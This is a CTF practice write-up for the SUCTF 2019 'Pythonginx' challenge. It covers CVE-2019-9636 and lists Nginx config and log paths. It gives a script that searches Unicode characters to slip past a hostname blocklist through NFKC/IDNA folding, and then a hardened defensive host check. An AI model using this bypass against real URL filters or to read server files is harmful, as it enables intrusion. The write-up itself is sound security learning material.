Practice log: [SUCTF 2019] Pythonginx

Challenge reproduction link: https://buuoj.cn/challenges
Reference links: 2019 SUCTF WP
SUCTF_2019 partial reproduction

I. Knowledge points involved

1. CVE-2019-9636: urlsplit does not handle NFKC normalization

https://bugs.python.org/issue36216

2. Locations of important Nginx files

  • Configuration file directory: /etc/nginx
  • Main configuration file: /etc/nginx/conf/nginx.conf
  • Management script: /usr/lib64/systemd/system/nginx.service
  • Modules: /usr/lib64/nginx/modules
  • Application: /usr/sbin/nginx
  • Default program (web root) location: /usr/share/nginx/html
  • Default log location: /var/log/nginx

II. Solution approach

Copied script

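from urllib import parse
from urllib.parse import urlsplit, urlunsplit


def get_unicode():
    # Try every BMP code point as the last character of the host and print
    # the ones for which getUrl() returns True.
    for x in range(65536):
        uni = chr(x)
        url = "http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: " + uni + ' unicode: \\u' + format(x, '04x'))
        except Exception:
            # Characters that urlparse or the idna codec rejects are skipped.
            pass


def getUrl(url):
    # Check 1: hostname as seen by urlparse must not be 'suctf.cc'.
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    # Check 2: netloc as seen by urlsplit must not be 'suctf.cc'.
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    # IDNA-encode each label, then rebuild the URL and parse it again.
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    # True only if the host became 'suctf.cc' after the IDNA step.
    return host == 'suctf.cc'


if __name__ == "__main__":
    get_unicode()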

Although I had thought it might be an encoding problem, I did not write a script to run it myself; I was a lazy dog.
The WP was found by searching GitHub, which really is the world's largest gay dating site; next time I should not limit myself to Baidu.
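
An added example, not from the original post or the challenge source: a defender-side host check that compares the blocklist against the host after NFKC and IDNA folding, which is the step the script above shows a raw hostname comparison misses. `BLOCKED_HOSTS`, `canonical_host`, `naive_is_blocked` and `is_blocked` are hypothetical names, and the sample URLs are constructed.

```python
import unicodedata
from urllib.parse import urlsplit

BLOCKED_HOSTS = {"suctf.cc"}   # hypothetical blocklist for this example
URL_DELIMS = set("/?#@:")      # characters that change URL structure


def canonical_host(url):
    """Return the ASCII host a later IDNA-encoding stage would end up with."""
    # Pythons patched for CVE-2019-9636 already raise ValueError here when
    # NFKC normalization of the netloc would introduce a URL delimiter.
    host = urlsplit(url).hostname
    if not host:
        raise ValueError("URL has no host")
    folded = unicodedata.normalize("NFKC", host)
    # Same check done explicitly, so unpatched interpreters are covered too.
    if URL_DELIMS & (set(folded) - set(host)):
        raise ValueError("host changes structure under NFKC")
    # The idna codec raises UnicodeError (a ValueError subclass) for labels
    # it cannot encode, e.g. empty or over-long labels.
    return folded.encode("idna").decode("ascii").lower().rstrip(".")


def naive_is_blocked(url):
    """Weak form: compares the raw parsed hostname only."""
    return urlsplit(url).hostname in BLOCKED_HOSTS


def is_blocked(url):
    """Hardened form: compare after folding, and fail closed on parse errors."""
    try:
        return canonical_host(url) in BLOCKED_HOSTS
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed sample URLs; U+2102 is a compatibility form of the letter C.
    for u in ("http://suctf.cc/", "http://suctf.c\u2102/", "http://example.com/"):
        print(ascii(u), "naive:", naive_is_blocked(u), "hardened:", is_blocked(u))
```

The comparison is only reliable when it is made on the same canonical form that the component performing the request will use, so `canonical_host` should also be the value passed on to that component.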

Origin www.cnblogs.com/20175211lyz/p/11470200.html